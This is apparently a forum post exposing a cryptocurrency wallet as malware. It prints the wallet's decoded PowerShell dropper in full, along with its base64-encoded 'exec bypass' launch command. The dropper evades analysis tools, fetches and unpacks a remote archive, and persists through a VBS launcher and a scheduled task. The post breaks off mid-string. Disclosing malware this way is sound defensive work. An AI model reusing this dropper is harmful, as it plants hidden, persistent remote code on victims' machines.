furcalor
Jr. Member
Offline
Activity: 59
Merit: 3
|
|
March 12, 2023, 10:51:46 PM Last edit: March 12, 2023, 11:27:43 PM by furcalor |
|
If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}} Stop writing this lies everywhere, give video evidence, if you have any at all Check out the virustotal link earlier in the topic, specifically the behavior one. GeckoCoin wallet executes this line: C:\Windows\System32\cmd.exe /C powershell.exe -exec bypass -enc SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A That is a base64 encoded line, that you can decode easily to see for your selves. On linux you can run the below line, or you can use something like https://www.base64decode.org/, just set the source character set to auto-detect. echo SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZ